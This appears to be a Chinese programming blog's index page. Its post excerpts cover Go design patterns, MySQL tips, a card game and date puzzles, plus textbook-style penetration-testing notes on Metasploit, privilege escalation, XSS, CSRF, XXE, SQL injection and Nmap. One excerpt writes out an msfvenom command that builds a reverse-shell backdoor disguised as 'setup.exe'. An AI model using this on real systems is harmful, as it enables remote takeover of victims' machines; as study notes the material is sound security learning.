舞指如歌~的博客

设计模式-单例模式-GoLang模板

设计模式-简单工厂模式-GoLang模板

假设情景：有多个班级。一个班级中有多名学生，现在查询每个班中获得最高分的学生信息。1. 添加limit缺点：受到limit数量的限制select * from ( select student_id, name, score,class_id from student order by score desc limit 100000) rgroup by r.class_id;2. 使用DISTINCT（居然也起到分组作用）我比较菜，select * from ( .

自己写一个程序，实现发牌、比大小判断输赢。#### 游戏规则：一付扑克牌，去掉大小王，每个玩家发3张牌，最后比大小，看谁赢。有以下几种牌：豹子：三张一样的牌，如3张6.顺金：又称同花顺，即3张同样花色的顺子， 如红桃 5、6、7顺子：又称拖拉机，花色不同，但是顺子，如红桃5、方片6、黑桃7，组成的顺子对子：2张牌一样单张：单张最大的是A这几种牌的大小顺序为， **豹子>顺金>顺子>对子>单张**#### 需程序实现的点：1. 先生成一付完整

2020/12/20 今天记录一个离谱的错误。。。才知道数据库中表名的创建也不能瞎起。向MySQL数据库中插入数据，sql语句没问题，但插入失败也不报错？

Python 代码：python求万年内对称日对称日：1001-10-01 1010-01-01 1011-11-01 1020-02-01 1021-12-01 1030-03-01 1040-04-01 1050-05-01 1060-06-01 1070-07-01 1080-08-01 1090-09-01 1101-10-11 1110-01-1...

背景：本来是老老实实的看论文，准备搞毕设，突然发现今天是2020.0202，谐音“爱你爱你，你爱你爱”。不得不说，这么有爱的“对称日”还是第一次碰见，上网一搜，果不其然，连民政局都在实力宠新人呢。嗯，今天是个不错的日子，适合结婚，要不要直接跟女朋友表白去拿证？突然，一阵敲门声响起...等等，女朋友？总所周知，程序员这种生物岂会有女朋友？？？大家退后啊，别滋了 别滋了，诶诶，那个尿毒症的快走，我...

5.6 后渗透攻击：权限提升通常获取的权限为Guest或User权限，必须将访问权限从Guest提升到User，再到Administrator，最后到System级别。提升权限的方式有两种：纵向提权：低权限角色获得高权限角色的权限 横向提权：获取同级别角色的权限输入shell进入目标机的cmd命令行，利用命令查看我们当前的权限：whoami /groups说明当前是一个标...

首先在kali上制作一个后门程序,文件名为：setup.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe#本地监听地址及端口号：192.168.1.100：5050为生成的文件 setup.exe 赋予可执行的权限，如果有必要可以对该文件执...

5.5 后渗透攻击：信息收集Metasploit提供了一个非常强大的后渗透工具------Meterpreter，该工具具有多重功能，后期渗透模块有200多个，Meterpreter有以下优势。纯内存工作模式，不需要对磁盘进行任何写入操作 使用加密通信协议，而且可以同时与几个信道通信 在被攻击进程内工作，不需要创建新的进程 易于在多进程之间迁移 平台通用，适用于Windows、Li...

第5章 Metasploit技术apt-get update:只更新软件包的索引源，作用是同步源的软件包的索引信息，从而进行软件更新。 apt-get upgrade:升级系统上安装的所有软件包，若更新失败，所涉及的包会保持更新之前的状态。 apt-get dist-upgrade:升级整个Linux系统。5.2 Metasploit基础5.2.1 专业术语MSF框架由多个模...

4.12 XXE漏洞4.12.1 介绍XXE漏洞XML外部实体注入（XML External Entity）简称XXE漏洞，XML用于标记电子文档使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档包括XML声明、DTD文档类型定义、文档元素。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的...

4.9 暴力破解“暴力破解”是一攻击具手段，在web攻击中，一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录，直到得到正确的结果。 为了提高效率，暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说，大多数系统都是可以被暴力破解的，只要攻击者有足够强大的计算能力和时间，所以断定一个系统是否存在暴力破解漏洞，其条件也不是绝对的。 我...

4.8 文件上传4.8.2 有关知识1.原因上传文件时，如果服务端未代码未对客户端上传的文件进行严格的验证和过滤，就容易造成可以上传任意文件的情况，包括上传脚本文件（asp、aspx、php、jsp等格式的文件）2.危害非法用户可以利用上传的恶意脚本文件控制整个网站，甚至控制服务器。这个恶意的脚本文件，又被称为WebShell，也可将WebShell脚本称为一种网页后门。4...

打开自带的IE浏览器（左下角搜索），找到工具----》Internet选项，修改局域网设置。

4.6 CSRF漏洞CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装成受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行也难以防范。4.6.2 利用CSRF漏...

4.4 XSS基础跨站脚本（Cross-Site Scripting）是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。允许恶意用户将代码注入网页，其他用户在浏览网页时就会受到影响。XSS攻击可以分为三种：反射型、存储型、DOM型。4.4.2 XSS漏洞原理1. 反射型XSS反射型XSS又称非持久型XSS，这种攻击方式往往具有一次性。2.存储型XSS又称持...

第四章Web安全原理剖析4.1 SQL注入的基础建议学习（菜鸟教程）：https://www.runoob.com/sql/sql-function.html4.1.3 与MySQL注入相关的知识点在MySQL 5.0版本之后，MySQL默认在数据库中存放一个"information_schema"的数据库，在该库中，需记住三个表名，分别是SCHEMATA、TABLES和COLUM...

3.3 Nmap详解Network Mapper：网络映射器，它被设计用来快速扫描大型网络，包括主机探测与发现、开放的端口情况、操作系统与应用服务指纹识别、WAF识别及常见安全漏洞。它的图形化界面是Zenmap，分布式框架为DNmap。3.3.2 NMap入门3.3.2.1 扫描参数设置扫描目标：-iL 从文件中导入目标主机或目标网段 -iR 随机选择目标主机 -e...